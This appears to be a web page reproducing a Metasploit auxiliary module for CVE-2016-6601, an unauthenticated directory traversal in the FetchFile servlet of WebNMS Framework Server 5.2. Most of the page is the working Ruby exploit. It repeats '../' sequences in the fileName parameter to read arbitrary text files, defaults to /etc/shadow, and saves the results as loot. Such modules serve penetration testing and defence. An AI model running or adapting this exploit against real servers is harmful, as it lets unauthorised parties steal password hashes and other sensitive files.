Headline
WebNMS Framework Server Arbitrary Text File Download
This Metasploit module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an unauthenticated user to download files off the file system by using a directory traversal attack on the FetchFile servlet. Note that only text files can be downloaded properly, as any binary file will get mangled by the servlet. Also note that for Windows targets you can only download files that are in the same drive as the WebNMS installation. This Metasploit module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on Windows and Linux.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info = {}) super( update_info( info, 'Name' => 'WebNMS Framework Server Arbitrary Text File Download', 'Description' => %q{ This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an unauthenticated user to download files off the file system by using a directory traversal attack on the FetchFile servlet. Note that only text files can be downloaded properly, as any binary file will get mangled by the servlet. Also note that for Windows targets you can only download files that are in the same drive as the WebNMS installation. This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on Windows and Linux. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-6601'], [ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ], [ 'URL', 'https://seclists.org/fulldisclosure/2016/Aug/54' ] ], 'DisclosureDate' => '2016-07-04' ) ) register_options( [ OptPort.new('RPORT', [true, 'The target port', 9090]), OptString.new('TARGETURI', [ true, 'WebNMS path', '/']), OptString.new('FILEPATH', [ false, 'The filepath of the file you want to download', '/etc/shadow']), OptString.new('TRAVERSAL_PATH', [ false, 'The traversal path to the target file (if you know it)']), OptInt.new('MAX_TRAVERSAL', [ false, "Maximum traversal path depth (if you don't know the traversal path)", 10]) ], self.class ) end def check_filename(path) valid = true invalid_chars = [':', '?', '*', '|', '"', '<', '>'] invalid_chars.each do |i| if path.include? i valid = false break end end end def run if check_filename(datastore['filepath']) file = nil if datastore['TRAVERSAL_PATH'].nil? traversal_size = datastore['MAX_TRAVERSAL'] file = get_file(datastore['FILEPATH'], traversal_size) else file = get_file(datastore['TRAVERSAL_PATH'], 1) end if file.nil? print_error("#{peer} - Failed to download the specified file.") return else vprint_line(file) fname = File.basename(datastore['FILEPATH']) path = store_loot( 'webnms.http', 'text/plain', datastore['RHOST'], file, fname ) print_good("File download successful, file saved in #{path}") end else print_error('Module Failed: Invalid Filename') end end def get_file(path, depth) while depth > 0 file_name = '../' * depth + path vprint_status("Attempting to get file: #{file_name}") begin res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, 'servlets', 'FetchFile'), 'method' => 'GET', 'vars_get' => { 'fileName' => file_name } } ) rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable, Errno::ECONNRESET => e print_error("Connect to the target: #{e.class} - #{e.message}") return nil end if res && res.code == 200 && !res.body.to_s.empty? && (res.body.to_s.include? 'File Found') return res.body.to_s end depth -= 1 end endend